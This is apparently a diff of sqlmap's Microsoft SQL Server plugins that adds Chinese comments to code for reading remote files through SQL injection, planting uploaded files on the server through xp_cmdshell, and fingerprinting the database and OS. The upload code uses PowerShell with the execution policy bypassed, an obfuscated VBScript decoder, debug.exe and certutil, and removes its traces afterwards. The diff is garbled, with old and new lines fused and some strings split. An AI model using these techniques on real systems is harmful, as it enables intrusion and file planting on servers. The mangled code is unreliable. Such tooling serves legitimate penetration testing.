if isTechniqueAvailable(PAYLOAD.TECHNIQUE.UNION): if isTechniqueAvailable(PAYLOAD.TECHNIQUE.UNION):
result = inject.getValue("SELECT %s FROM %s ORDER BY id ASC" % (self.tblField, hexTbl), resumeValue=False, blind=False, time=False, error=False) result = inject.getValue("SELECT %s FROM %s ORDER BY id ASC" % (self.tblField, hexTbl), resumeValue=False, blind=False, time=False, error=False)
# 如果无法使用 UNION 注入,则使用推断注入来读取十六进制表
if not result: if not result:
result = [] result = []
count = inject.getValue("SELECT COUNT(*) FROM %s" % (hexTbl), resumeValue=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS) count = inject.getValue("SELECT COUNT(*) FROM %s" % (hexTbl), resumeValue=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS) # 获取十六进制表的行数
if not isNumPosStrValue(count): if not isNumPosStrValue(count):
errMsg = "unable to retrieve the content of the " errMsg = "unable to retrieve the content of the "
errMsg += "file '%s'" % remoteFile errMsg += "file '%s'" % remoteFile
raise SqlmapNoneDataException(errMsg) raise SqlmapNoneDataException(errMsg)
indexRange = getLimitRange(count) indexRange = getLimitRange(count) # 生成索引范围
# 遍历索引范围,逐行读取十六进制数据
for index in indexRange: for index in indexRange:
chunk = inject.getValue("SELECT TOP 1 %s FROM %s WHERE %s NOT IN (SELECT TOP %d %s FROM %s ORDER BY id ASC) ORDER BY id ASC" % (self.tblField, hexTbl, self.tblField, index, self.tblField, hexTbl), unpack=False, resumeValue=False, charsetType=CHARSET_TYPE.HEXADECIMAL) chunk = inject.getValue("SELECT TOP 1 %s FROM %s WHERE %s NOT IN (SELECT TOP %d %s FROM %s ORDER BY id ASC) ORDER BY id ASC" % (self.tblField, hexTbl, self.tblField, index, self.tblField, hexTbl), unpack=False, resumeValue=False, charsetType=CHARSET_TYPE.HEXADECIMAL)
result.append(chunk) result.append(chunk)
inject.goStacked("DROP TABLE %s" % hexTbl) inject.goStacked("DROP TABLE %s" % hexTbl) # 删除十六进制表
return result return result # 返回读取的文件内容
# 定义 unionWriteFile 方法,用于使用 UNION 注入写入文件,但此方法不支持 SQL Server
def unionWriteFile(self, localFile, remoteFile, fileType, forceCheck=False): def unionWriteFile(self, localFile, remoteFile, fileType, forceCheck=False):
errMsg = "Microsoft SQL Server does not support file upload with " errMsg = "Microsoft SQL Server does not support file upload with "
errMsg += "UNION query SQL injection technique" errMsg += "UNION query SQL injection technique"
raise SqlmapUnsupportedFeatureException(errMsg) raise SqlmapUnsupportedFeatureException(errMsg)
# 定义 _stackedWriteFilePS 方法,用于使用 PowerShell 写入文件内容
def _stackedWriteFilePS(self, tmpPath, localFileContent, remoteFile, fileType): def _stackedWriteFilePS(self, tmpPath, localFileContent, remoteFile, fileType):
infoMsg = "using PowerShell to write the %s file content " % fileType infoMsg = "using PowerShell to write the %s file content " % fileType
infoMsg += "to file '%s'" % remoteFile infoMsg += "to file '%s'" % remoteFile
logger.info(infoMsg) logger.info(infoMsg)
encodedFileContent = encodeBase64(localFileContent, binary=False) encodedFileContent = encodeBase64(localFileContent, binary=False) # 将文件内容进行 Base64 编码
encodedBase64File = "tmpf%s.txt" % randomStr(lowercase=True) encodedBase64File = "tmpf%s.txt" % randomStr(lowercase=True) # 生成随机的 Base64 文件名
encodedBase64FilePath = "%s\\%s" % (tmpPath, encodedBase64File) encodedBase64FilePath = "%s\\%s" % (tmpPath, encodedBase64File) # 构建 Base64 文件路径
randPSScript = "tmpps%s.ps1" % randomStr(lowercase=True) randPSScript = "tmpps%s.ps1" % randomStr(lowercase=True) # 生成随机的 PowerShell 脚本文件名
randPSScriptPath = "%s\\%s" % (tmpPath, randPSScript) randPSScriptPath = "%s\\%s" % (tmpPath, randPSScript) # 构建 PowerShell 脚本路径
localFileSize = len(encodedFileContent) localFileSize = len(encodedFileContent) # 获取 Base64 编码后的文件大小
chunkMaxSize = 1024 chunkMaxSize = 1024 # 设置最大 chunk 大小
logger.debug("uploading the base64-encoded file to %s, please wait.." % encodedBase64FilePath) logger.debug("uploading the base64-encoded file to %s, please wait.." % encodedBase64FilePath)
# 循环上传 Base64 编码后的文件内容
for i in xrange(0, localFileSize, chunkMaxSize): for i in xrange(0, localFileSize, chunkMaxSize):
wEncodedChunk = encodedFileContent[i:i + chunkMaxSize] wEncodedChunk = encodedFileContent[i:i + chunkMaxSize]
self.xpCmdshellWriteFile(wEncodedChunk, tmpPath, encodedBase64File) self.xpCmdshellWriteFile(wEncodedChunk, tmpPath, encodedBase64File) # 使用 xp_cmdshell 将 Base64 编码后的文件内容写入到服务器
# 构建 PowerShell 脚本
psString = "$Base64 = Get-Content -Path \"%s\"; " % encodedBase64FilePath psString = "$Base64 = Get-Content -Path \"%s\"; " % encodedBase64FilePath
psString += "$Base64 = $Base64 -replace \"`t|`n|`r\",\"\"; $Content = " psString += "$Base64 = $Base64 -replace \"`t|`n|`r\",\"\"; $Content = "
psString += "[System.Convert]::FromBase64String($Base64); Set-Content " psString += "[System.Convert]::FromBase64String($Base64); Set-Content "
psString += "-Path \"%s\" -Value $Content -Encoding Byte" % remoteFile psString += "-Path \"%s\" -Value $Content -Encoding Byte" % remoteFile
logger.debug("uploading the PowerShell base64-decoding script to %s" % randPSScriptPath) logger.debug("uploading the PowerShell base64-decoding script to %s" % randPSScriptPath)
self.xpCmdshellWriteFile(psString, tmpPath, randPSScript) self.xpCmdshellWriteFile(psString, tmpPath, randPSScript) # 使用 xp_cmdshell 将 PowerShell 脚本写入到服务器
logger.debug("executing the PowerShell base64-decoding script to write the %s file, please wait.." % remoteFile) logger.debug("executing the PowerShell base64-decoding script to write the %s file, please wait.." % remoteFile)
# 执行 PowerShell 脚本,将 Base64 编码后的文件内容解码并写入到目标文件
commands = ( commands = (
"powershell -ExecutionPolicy ByPass -File \"%s\"" % randPSScriptPath, "powershell -ExecutionPolicy ByPass -File \"%s\"" % randPSScriptPath,
"del /F /Q \"%s\"" % encodedBase64FilePath, "del /F /Q \"%s\"" % encodedBase64FilePath,
@ -208,23 +224,26 @@ class Filesystem(GenericFilesystem):
self.execCmd(" & ".join(command for command in commands)) self.execCmd(" & ".join(command for command in commands))
# 定义 _stackedWriteFileDebugExe 方法,用于使用 debug.exe 写入文件内容
def _stackedWriteFileDebugExe(self, tmpPath, localFile, localFileContent, remoteFile, fileType): def _stackedWriteFileDebugExe(self, tmpPath, localFile, localFileContent, remoteFile, fileType):
infoMsg = "using debug.exe to write the %s " % fileType infoMsg = "using debug.exe to write the %s " % fileType
infoMsg += "file content to file '%s', please wait.." % remoteFile infoMsg += "file content to file '%s', please wait.." % remoteFile
logger.info(infoMsg) logger.info(infoMsg)
remoteFileName = ntpath.basename(remoteFile) remoteFileName = ntpath.basename(remoteFile) # 获取远程文件名
sFile = "%s\\%s" % (tmpPath, remoteFileName) sFile = "%s\\%s" % (tmpPath, remoteFileName) # 构建远程文件路径
localFileSize = os.path.getsize(localFile) localFileSize = os.path.getsize(localFile) # 获取本地文件大小
debugSize = 0xFF00 debugSize = 0xFF00 # 设置 debug.exe 的最大写入大小
# 如果文件小于 debug.exe 的最大写入大小,则直接写入
if localFileSize < debugSize: if localFileSize < debugSize:
chunkName = self._updateDestChunk(localFileContent, tmpPath) chunkName = self._updateDestChunk(localFileContent, tmpPath) # 将文件内容转换为 debug.exe 脚本并生成 chunk 文件
debugMsg = "renaming chunk file %s\\%s to %s " % (tmpPath, chunkName, fileType) debugMsg = "renaming chunk file %s\\%s to %s " % (tmpPath, chunkName, fileType)
debugMsg += "file %s\\%s and moving it to %s" % (tmpPath, remoteFileName, remoteFile) debugMsg += "file %s\\%s and moving it to %s" % (tmpPath, remoteFileName, remoteFile)
logger.debug(debugMsg) logger.debug(debugMsg)
# 将 chunk 文件重命名为目标文件名并移动到目标路径
commands = ( commands = (
"cd \"%s\"" % tmpPath, "cd \"%s\"" % tmpPath,
"ren %s %s" % (chunkName, remoteFileName), "ren %s %s" % (chunkName, remoteFileName),
@ -232,6 +251,7 @@ class Filesystem(GenericFilesystem):
) )
self.execCmd(" & ".join(command for command in commands)) self.execCmd(" & ".join(command for command in commands))
# 如果文件大于 debug.exe 的最大写入大小,则分块写入
else: else:
debugMsg = "the file is larger than %d bytes. " % debugSize debugMsg = "the file is larger than %d bytes. " % debugSize
debugMsg += "sqlmap will split it into chunks locally, upload " debugMsg += "sqlmap will split it into chunks locally, upload "
@ -239,10 +259,12 @@ class Filesystem(GenericFilesystem):
debugMsg += "on the server, please wait.." debugMsg += "on the server, please wait.."
logger.debug(debugMsg) logger.debug(debugMsg)
# 循环分块写入文件
for i in xrange(0, localFileSize, debugSize): for i in xrange(0, localFileSize, debugSize):
localFileChunk = localFileContent[i:i + debugSize] localFileChunk = localFileContent[i:i + debugSize] # 获取文件 chunk
chunkName = self._updateDestChunk(localFileChunk, tmpPath) chunkName = self._updateDestChunk(localFileChunk, tmpPath) # 将文件 chunk 转换为 debug.exe 脚本并生成 chunk 文件
# 如果是第一个 chunk则重命名否则合并 chunk
if i == 0: if i == 0:
debugMsg = "renaming chunk " debugMsg = "renaming chunk "
copyCmd = "ren %s %s" % (chunkName, remoteFileName) copyCmd = "ren %s %s" % (chunkName, remoteFileName)
@ -253,6 +275,7 @@ class Filesystem(GenericFilesystem):
debugMsg += "%s\\%s to %s file %s\\%s" % (tmpPath, chunkName, fileType, tmpPath, remoteFileName) debugMsg += "%s\\%s to %s file %s\\%s" % (tmpPath, chunkName, fileType, tmpPath, remoteFileName)
logger.debug(debugMsg) logger.debug(debugMsg)
# 执行重命名或合并操作
commands = ( commands = (
"cd \"%s\"" % tmpPath, "cd \"%s\"" % tmpPath,
copyCmd, copyCmd,
@ -263,6 +286,7 @@ class Filesystem(GenericFilesystem):
logger.debug("moving %s file %s to %s" % (fileType, sFile, remoteFile)) logger.debug("moving %s file %s to %s" % (fileType, sFile, remoteFile))
# 将合并后的文件移动到目标路径
commands = ( commands = (
"cd \"%s\"" % tmpPath, "cd \"%s\"" % tmpPath,
"move /Y %s %s" % (remoteFileName, remoteFile) "move /Y %s %s" % (remoteFileName, remoteFile)
@ -270,15 +294,17 @@ class Filesystem(GenericFilesystem):
self.execCmd(" & ".join(command for command in commands)) self.execCmd(" & ".join(command for command in commands))
# 定义 _stackedWriteFileVbs 方法,用于使用 VBScript 写入文件内容
def _stackedWriteFileVbs(self, tmpPath, localFileContent, remoteFile, fileType): def _stackedWriteFileVbs(self, tmpPath, localFileContent, remoteFile, fileType):
infoMsg = "using a custom visual basic script to write the " infoMsg = "using a custom visual basic script to write the "
infoMsg += "%s file content to file '%s', please wait.." % (fileType, remoteFile) infoMsg += "%s file content to file '%s', please wait.." % (fileType, remoteFile)
logger.info(infoMsg) logger.info(infoMsg)
randVbs = "tmps%s.vbs" % randomStr(lowercase=True) randVbs = "tmps%s.vbs" % randomStr(lowercase=True) # 生成随机的 VBScript 文件名
randFile = "tmpf%s.txt" % randomStr(lowercase=True) randFile = "tmpf%s.txt" % randomStr(lowercase=True) # 生成随机的临时文件名
randFilePath = "%s\\%s" % (tmpPath, randFile) randFilePath = "%s\\%s" % (tmpPath, randFile) # 构建临时文件路径
# 构建 VBScript 脚本
vbs = """Qvz vachgSvyrCngu, bhgchgSvyrCngu vbs = """Qvz vachgSvyrCngu, bhgchgSvyrCngu
vachgSvyrCngu = "%f" vachgSvyrCngu = "%f"
bhgchgSvyrCngu = "%f" bhgchgSvyrCngu = "%f"
@ -334,18 +360,17 @@ class Filesystem(GenericFilesystem):
Raq Shapgvba""" Raq Shapgvba"""
# NOTE: https://github.com/sqlmapproject/sqlmap/issues/5581 # NOTE: https://github.com/sqlmapproject/sqlmap/issues/5581
vbs = rot13(vbs) vbs = rot13(vbs) # 对 VBScript 脚本进行 ROT13 编码
vbs = vbs.replace(" ", "") vbs = vbs.replace(" ", "") # 移除多余空格
encodedFileContent = encodeBase64(localFileContent, binary=False) encodedFileContent = encodeBase64(localFileContent, binary=False) # 将文件内容进行 Base64 编码
logger.debug("uploading the file base64-encoded content to %s, please wait.." % randFilePath) logger.debug("uploading the file base64-encoded content to %s, please wait.." % randFilePath)
self.xpCmdshellWriteFile(encodedFileContent, tmpPath, randFile) # 使用 xp_cmdshell 将 Base64 编码后的文件内容写入到服务器
self.xpCmdshellWriteFile(encodedFileContent, tmpPath, randFile)
logger.debug("uploading a visual basic decoder stub %s\\%s, please wait.." % (tmpPath, randVbs)) logger.debug("uploading a visual basic decoder stub %s\\%s, please wait.." % (tmpPath, randVbs))
self.xpCmdshellWriteFile(vbs, tmpPath, randVbs) # 使用 xp_cmdshell 将 VBScript 脚本写入到服务器
self.xpCmdshellWriteFile(vbs, tmpPath, randVbs) # 执行 VBScript 脚本,将 Base64 编码后的文件内容解码并写入到目标文件
commands = ( commands = (
"cd \"%s\"" % tmpPath, "cd \"%s\"" % tmpPath,
"cscript //nologo %s" % randVbs, "cscript //nologo %s" % randVbs,
@ -355,26 +380,28 @@ class Filesystem(GenericFilesystem):
self.execCmd(" & ".join(command for command in commands)) self.execCmd(" & ".join(command for command in commands))
# 定义 _stackedWriteFileCertutilExe 方法,用于使用 certutil.exe 写入文件内容
def _stackedWriteFileCertutilExe(self, tmpPath, localFile, localFileContent, remoteFile, fileType): def _stackedWriteFileCertutilExe(self, tmpPath, localFile, localFileContent, remoteFile, fileType):
infoMsg = "using certutil.exe to write the %s " % fileType infoMsg = "using certutil.exe to write the %s " % fileType
infoMsg += "file content to file '%s', please wait.." % remoteFile infoMsg += "file content to file '%s', please wait.." % remoteFile
logger.info(infoMsg) logger.info(infoMsg)
chunkMaxSize = 500 chunkMaxSize = 500 # 设置最大 chunk 大小
randFile = "tmpf%s.txt" % randomStr(lowercase=True) randFile = "tmpf%s.txt" % randomStr(lowercase=True) # 生成随机的文件名
randFilePath = "%s\\%s" % (tmpPath, randFile) randFilePath = "%s\\%s" % (tmpPath, randFile) # 构建文件路径
encodedFileContent = encodeBase64(localFileContent, binary=False) encodedFileContent = encodeBase64(localFileContent, binary=False) # 将文件内容进行 Base64 编码
splittedEncodedFileContent = '\n'.join([encodedFileContent[i:i + chunkMaxSize] for i in xrange(0, len(encodedFileContent), chunkMaxSize)]) splittedEncodedFileContent = '\
'.join([encodedFileContent[i:i + chunkMaxSize] for i in xrange(0, len(encodedFileContent), chunkMaxSize)]) # 分块 Base64 编码文件内容
logger.debug("uploading the file base64-encoded content to %s, please wait.." % randFilePath) logger.debug("uploading the file base64-encoded content to %s, please wait.." % randFilePath)
self.xpCmdshellWriteFile(splittedEncodedFileContent, tmpPath, randFile) # 使用 xp_cmdshell 将分块 Base64 编码后的文件内容写入到服务器
self.xpCmdshellWriteFile(splittedEncodedFileContent, tmpPath, randFile)
logger.debug("decoding the file to %s.." % remoteFile) logger.debug("decoding the file to %s.." % remoteFile)
# 执行 certutil.exe 命令,将 Base64 编码后的文件内容解码并写入到目标文件
commands = ( commands = (
"cd \"%s\"" % tmpPath, "cd \"%s\"" % tmpPath,
"certutil -f -decode %s %s" % (randFile, remoteFile), "certutil -f -decode %s %s" % (randFile, remoteFile),
@ -383,6 +410,7 @@ class Filesystem(GenericFilesystem):
self.execCmd(" & ".join(command for command in commands)) self.execCmd(" & ".join(command for command in commands))
# 定义 stackedWriteFile 方法,用于使用堆叠查询写入文件
def stackedWriteFile(self, localFile, remoteFile, fileType, forceCheck=False): def stackedWriteFile(self, localFile, remoteFile, fileType, forceCheck=False):
# NOTE: this is needed here because we use xp_cmdshell extended # NOTE: this is needed here because we use xp_cmdshell extended
# procedure to write a file on the back-end Microsoft SQL Server # procedure to write a file on the back-end Microsoft SQL Server
@ -390,15 +418,16 @@ class Filesystem(GenericFilesystem):
self.initEnv() self.initEnv()
self.getRemoteTempPath() self.getRemoteTempPath()
tmpPath = posixToNtSlashes(conf.tmpPath) tmpPath = posixToNtSlashes(conf.tmpPath) # 获取临时路径并转换为 NT 路径
remoteFile = posixToNtSlashes(remoteFile) remoteFile = posixToNtSlashes(remoteFile) # 将远程文件名转换为 NT 路径
checkFile(localFile) checkFile(localFile) # 检查本地文件是否存在
localFileContent = open(localFile, "rb").read() localFileContent = open(localFile, "rb").read() # 读取本地文件内容
self._stackedWriteFilePS(tmpPath, localFileContent, remoteFile, fileType) self._stackedWriteFilePS(tmpPath, localFileContent, remoteFile, fileType) # 尝试使用 PowerShell 写入文件
written = self.askCheckWrittenFile(localFile, remoteFile, forceCheck) written = self.askCheckWrittenFile(localFile, remoteFile, forceCheck) # 询问是否成功写入
# 如果 PowerShell 写入失败,则尝试使用 VBScript 写入文件
if written is False: if written is False:
message = "do you want to try to upload the file with " message = "do you want to try to upload the file with "
message += "the custom Visual Basic script technique? [Y/n] " message += "the custom Visual Basic script technique? [Y/n] "
@ -407,6 +436,7 @@ class Filesystem(GenericFilesystem):
self._stackedWriteFileVbs(tmpPath, localFileContent, remoteFile, fileType) self._stackedWriteFileVbs(tmpPath, localFileContent, remoteFile, fileType)
written = self.askCheckWrittenFile(localFile, remoteFile, forceCheck) written = self.askCheckWrittenFile(localFile, remoteFile, forceCheck)
# 如果 VBScript 写入失败,则尝试使用 debug.exe 写入文件
if written is False: if written is False:
message = "do you want to try to upload the file with " message = "do you want to try to upload the file with "
message += "the built-in debug.exe technique? [Y/n] " message += "the built-in debug.exe technique? [Y/n] "
@ -415,6 +445,7 @@ class Filesystem(GenericFilesystem):
self._stackedWriteFileDebugExe(tmpPath, localFile, localFileContent, remoteFile, fileType) self._stackedWriteFileDebugExe(tmpPath, localFile, localFileContent, remoteFile, fileType)
written = self.askCheckWrittenFile(localFile, remoteFile, forceCheck) written = self.askCheckWrittenFile(localFile, remoteFile, forceCheck)
# 如果 debug.exe 写入失败,则尝试使用 certutil.exe 写入文件
if written is False: if written is False:
message = "do you want to try to upload the file with " message = "do you want to try to upload the file with "
message += "the built-in certutil.exe technique? [Y/n] " message += "the built-in certutil.exe technique? [Y/n] "
@ -423,4 +454,4 @@ class Filesystem(GenericFilesystem):
self._stackedWriteFileCertutilExe(tmpPath, localFile, localFileContent, remoteFile, fileType) self._stackedWriteFileCertutilExe(tmpPath, localFile, localFileContent, remoteFile, fileType)
written = self.askCheckWrittenFile(localFile, remoteFile, forceCheck) written = self.askCheckWrittenFile(localFile, remoteFile, forceCheck)
return written return written # 返回是否成功写入

@ -5,89 +5,96 @@ Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission See the file 'LICENSE' for copying permission
""" """
from lib.core.common import Backend # 导入必要的模块
from lib.core.common import Format from lib.core.common import Backend # 导入 Backend 类,用于访问后端数据库信息
from lib.core.convert import getUnicode from lib.core.common import Format # 导入 Format 类,用于格式化输出信息
from lib.core.data import conf from lib.core.convert import getUnicode # 导入 getUnicode 函数,用于获取 Unicode 字符串
from lib.core.data import kb from lib.core.data import conf # 导入 conf 对象,用于访问全局配置信息
from lib.core.data import logger from lib.core.data import kb # 导入 kb 对象,用于访问全局知识库
from lib.core.enums import DBMS from lib.core.data import logger # 导入 logger 对象,用于输出日志
from lib.core.enums import OS from lib.core.enums import DBMS # 导入 DBMS 枚举,定义数据库管理系统类型
from lib.core.session import setDbms from lib.core.enums import OS # 导入 OS 枚举,定义操作系统类型
from lib.core.settings import MSSQL_ALIASES from lib.core.session import setDbms # 导入 setDbms 函数,用于设置数据库类型
from lib.request import inject from lib.core.settings import MSSQL_ALIASES # 导入 MSSQL_ALIASES 常量,定义 SQL Server 的别名
from plugins.generic.fingerprint import Fingerprint as GenericFingerprint from lib.request import inject # 导入 inject 函数,用于执行 SQL 注入请求
from plugins.generic.fingerprint import Fingerprint as GenericFingerprint # 导入 GenericFingerprint 类,作为当前类的父类
# 定义 Fingerprint 类,继承自 GenericFingerprint
class Fingerprint(GenericFingerprint): class Fingerprint(GenericFingerprint):
# 初始化 Fingerprint 类,设置数据库类型为 MSSQL
def __init__(self): def __init__(self):
GenericFingerprint.__init__(self, DBMS.MSSQL) GenericFingerprint.__init__(self, DBMS.MSSQL)
# 定义 getFingerprint 方法,用于获取数据库指纹信息
def getFingerprint(self): def getFingerprint(self):
value = "" value = "" # 初始化指纹信息字符串
wsOsFp = Format.getOs("web server", kb.headersFp) wsOsFp = Format.getOs("web server", kb.headersFp) # 获取 Web 服务器操作系统信息
if wsOsFp: if wsOsFp:
value += "%s\n" % wsOsFp value += "%s\
" % wsOsFp # 将 Web 服务器操作系统信息添加到指纹信息
if kb.data.banner: if kb.data.banner: # 如果存在数据库 banner 信息
dbmsOsFp = Format.getOs("back-end DBMS", kb.bannerFp) dbmsOsFp = Format.getOs("back-end DBMS", kb.bannerFp) # 获取数据库操作系统信息
if dbmsOsFp: if dbmsOsFp:
value += "%s\n" % dbmsOsFp value += "%s\
" % dbmsOsFp # 将数据库操作系统信息添加到指纹信息
value += "back-end DBMS: " value += "back-end DBMS: " # 添加数据库类型标签
actVer = Format.getDbms() actVer = Format.getDbms() # 获取数据库类型
if not conf.extensiveFp: if not conf.extensiveFp: # 如果不需要详细指纹信息
value += actVer value += actVer # 将数据库类型添加到指纹信息
return value return value # 返回指纹信息
blank = " " * 15 blank = " " * 15 # 定义缩进空格
value += "active fingerprint: %s" % actVer value += "active fingerprint: %s" % actVer # 添加当前指纹信息
if kb.bannerFp: if kb.bannerFp: # 如果存在数据库 banner 信息
release = kb.bannerFp.get("dbmsRelease") release = kb.bannerFp.get("dbmsRelease") # 获取数据库版本发布信息
version = kb.bannerFp.get("dbmsVersion") version = kb.bannerFp.get("dbmsVersion") # 获取数据库版本信息
servicepack = kb.bannerFp.get("dbmsServicePack") servicepack = kb.bannerFp.get("dbmsServicePack") # 获取数据库服务包信息
if release and version and servicepack: if release and version and servicepack: # 如果所有信息都存在
banVer = "%s %s " % (DBMS.MSSQL, release) banVer = "%s %s " % (DBMS.MSSQL, release) # 构建 banner 版本信息
banVer += "Service Pack %s " % servicepack banVer += "Service Pack %s " % servicepack # 添加服务包信息
banVer += "version %s" % version banVer += "version %s" % version # 添加版本信息
value += "\n%sbanner parsing fingerprint: %s" % (blank, banVer) value += "\
%sbanner parsing fingerprint: %s" % (blank, banVer) # 将 banner 版本信息添加到指纹信息
htmlErrorFp = Format.getErrorParsedDBMSes() htmlErrorFp = Format.getErrorParsedDBMSes() # 获取 HTML 错误信息中的数据库信息
if htmlErrorFp: if htmlErrorFp:
value += "\n%shtml error message fingerprint: %s" % (blank, htmlErrorFp) value += "\
%shtml error message fingerprint: %s" % (blank, htmlErrorFp) # 将 HTML 错误信息中的数据库信息添加到指纹信息
return value return value # 返回指纹信息
# 定义 checkDbms 方法,用于检查数据库类型是否为 MSSQL
def checkDbms(self): def checkDbms(self):
if not conf.extensiveFp and Backend.isDbmsWithin(MSSQL_ALIASES): if not conf.extensiveFp and Backend.isDbmsWithin(MSSQL_ALIASES): # 如果不需要详细指纹并且数据库别名匹配
setDbms("%s %s" % (DBMS.MSSQL, Backend.getVersion())) setDbms("%s %s" % (DBMS.MSSQL, Backend.getVersion())) # 设置数据库类型
self.getBanner() # 获取数据库 banner 信息
self.getBanner() Backend.setOs(OS.WINDOWS) # 设置操作系统类型为 Windows
return True # 返回 True
Backend.setOs(OS.WINDOWS)
return True
infoMsg = "testing %s" % DBMS.MSSQL infoMsg = "testing %s" % DBMS.MSSQL # 输出正在测试 MSSQL 的信息
logger.info(infoMsg) logger.info(infoMsg)
# NOTE: SELECT LEN(@@VERSION)=LEN(@@VERSION) FROM DUAL does not # NOTE: SELECT LEN(@@VERSION)=LEN(@@VERSION) FROM DUAL does not
# work connecting directly to the Microsoft SQL Server database # work connecting directly to the Microsoft SQL Server database
if conf.direct: if conf.direct: # 如果是直接连接
result = True result = True # 直接设置为 True
else: else:
result = inject.checkBooleanExpression("UNICODE(SQUARE(NULL)) IS NULL") result = inject.checkBooleanExpression("UNICODE(SQUARE(NULL)) IS NULL") # 使用 SQL 注入检查
if result: if result: # 如果检查结果为 True
infoMsg = "confirming %s" % DBMS.MSSQL infoMsg = "confirming %s" % DBMS.MSSQL # 输出确认是 MSSQL 的信息
logger.info(infoMsg) logger.info(infoMsg)
# 遍历不同的 MSSQL 版本及其检查语句
for version, check in ( for version, check in (
("2022", "CHARINDEX('16.0.',@@VERSION)>0"), ("2022", "CHARINDEX('16.0.',@@VERSION)>0"),
("2019", "CHARINDEX('15.0.',@@VERSION)>0"), ("2019", "CHARINDEX('15.0.',@@VERSION)>0"),
@ -100,48 +107,46 @@ class Fingerprint(GenericFingerprint):
("2005", "XACT_STATE()=XACT_STATE()"), ("2005", "XACT_STATE()=XACT_STATE()"),
("2000", "HOST_NAME()=HOST_NAME()"), ("2000", "HOST_NAME()=HOST_NAME()"),
): ):
result = inject.checkBooleanExpression(check) result = inject.checkBooleanExpression(check) # 使用 SQL 注入检查版本
if result: if result:
Backend.setVersion(version) Backend.setVersion(version) # 设置数据库版本
break break
if Backend.getVersion(): if Backend.getVersion():
setDbms("%s %s" % (DBMS.MSSQL, Backend.getVersion())) setDbms("%s %s" % (DBMS.MSSQL, Backend.getVersion())) # 设置数据库类型和版本
else: else:
setDbms(DBMS.MSSQL) setDbms(DBMS.MSSQL) # 设置数据库类型
self.getBanner() self.getBanner() # 获取数据库 banner 信息
Backend.setOs(OS.WINDOWS) # 设置操作系统类型为 Windows
Backend.setOs(OS.WINDOWS) return True # 返回 True
else: # 如果检查结果为 False
return True warnMsg = "the back-end DBMS is not %s" % DBMS.MSSQL # 输出警告信息
else:
warnMsg = "the back-end DBMS is not %s" % DBMS.MSSQL
logger.warning(warnMsg) logger.warning(warnMsg)
return False # 返回 False
return False # 定义 checkDbmsOs 方法,用于检查数据库操作系统信息
def checkDbmsOs(self, detailed=False): def checkDbmsOs(self, detailed=False):
if Backend.getOs() and Backend.getOsVersion() and Backend.getOsServicePack(): if Backend.getOs() and Backend.getOsVersion() and Backend.getOsServicePack(): # 如果已获取操作系统信息,则直接返回
return return
if not Backend.getOs(): if not Backend.getOs(): # 如果没有获取操作系统信息
Backend.setOs(OS.WINDOWS) Backend.setOs(OS.WINDOWS) # 设置操作系统类型为 Windows
if not detailed: if not detailed: # 如果不需要详细信息,则直接返回
return return
infoMsg = "fingerprinting the back-end DBMS operating system " infoMsg = "fingerprinting the back-end DBMS operating system " # 输出正在获取操作系统版本和服务包的信息
infoMsg += "version and service pack" infoMsg += "version and service pack"
logger.info(infoMsg) logger.info(infoMsg)
infoMsg = "the back-end DBMS operating system is %s" % Backend.getOs() infoMsg = "the back-end DBMS operating system is %s" % Backend.getOs() # 输出操作系统类型
self.createSupportTbl(self.fileTblName, self.tblField, "varchar(1000)") self.createSupportTbl(self.fileTblName, self.tblField, "varchar(1000)") # 创建支持表,用于存储版本信息
inject.goStacked("INSERT INTO %s(%s) VALUES (%s)" % (self.fileTblName, self.tblField, "@@VERSION")) inject.goStacked("INSERT INTO %s(%s) VALUES (%s)" % (self.fileTblName, self.tblField, "@@VERSION")) # 将 @@VERSION 写入支持表
# Reference: https://en.wikipedia.org/wiki/Comparison_of_Microsoft_Windows_versions # 参考:https://en.wikipedia.org/wiki/Comparison_of_Microsoft_Windows_versions
# https://en.wikipedia.org/wiki/Windows_NT#Releases # https://en.wikipedia.org/wiki/Windows_NT#Releases
versions = { versions = {
"NT": ("4.0", (6, 5, 4, 3, 2, 1)), "NT": ("4.0", (6, 5, 4, 3, 2, 1)),
@ -155,50 +160,50 @@ class Fingerprint(GenericFingerprint):
"10 or 11 or 2016 or 2019 or 2022": ("10.0", (0,)) "10 or 11 or 2016 or 2019 or 2022": ("10.0", (0,))
} }
# Get back-end DBMS underlying operating system version # 获取数据库操作系统版本
for version, data in versions.items(): for version, data in versions.items():
query = "EXISTS(SELECT %s FROM %s WHERE %s " % (self.tblField, self.fileTblName, self.tblField) query = "EXISTS(SELECT %s FROM %s WHERE %s " % (self.tblField, self.fileTblName, self.tblField) # 构建查询语句
query += "LIKE '%Windows NT " + data[0] + "%')" query += "LIKE '%Windows NT " + data[0] + "%')" # 添加版本判断条件
result = inject.checkBooleanExpression(query) result = inject.checkBooleanExpression(query) # 使用 SQL 注入检查
if result: if result:
Backend.setOsVersion(version) Backend.setOsVersion(version) # 设置操作系统版本
infoMsg += " %s" % Backend.getOsVersion() infoMsg += " %s" % Backend.getOsVersion() # 将操作系统版本信息添加到日志信息
break break
if not Backend.getOsVersion(): if not Backend.getOsVersion(): # 如果没有获取到操作系统版本
Backend.setOsVersion("2003") Backend.setOsVersion("2003") # 默认设置为 2003
Backend.setOsServicePack(2) Backend.setOsServicePack(2) # 默认设置为服务包 2
warnMsg = "unable to fingerprint the underlying operating " warnMsg = "unable to fingerprint the underlying operating "
warnMsg += "system version, assuming it is Windows " warnMsg += "system version, assuming it is Windows "
warnMsg += "%s Service Pack %d" % (Backend.getOsVersion(), Backend.getOsServicePack()) warnMsg += "%s Service Pack %d" % (Backend.getOsVersion(), Backend.getOsServicePack())
logger.warning(warnMsg) logger.warning(warnMsg)
self.cleanup(onlyFileTbl=True) self.cleanup(onlyFileTbl=True) # 清理支持表
return return
# Get back-end DBMS underlying operating system service pack # 获取操作系统服务包
sps = versions[Backend.getOsVersion()][1] sps = versions[Backend.getOsVersion()][1] # 获取服务包列表
for sp in sps: for sp in sps:
query = "EXISTS(SELECT %s FROM %s WHERE %s " % (self.tblField, self.fileTblName, self.tblField) query = "EXISTS(SELECT %s FROM %s WHERE %s " % (self.tblField, self.fileTblName, self.tblField) # 构建查询语句
query += "LIKE '%Service Pack " + getUnicode(sp) + "%')" query += "LIKE '%Service Pack " + getUnicode(sp) + "%')" # 添加服务包判断条件
result = inject.checkBooleanExpression(query) result = inject.checkBooleanExpression(query) # 使用 SQL 注入检查
if result: if result:
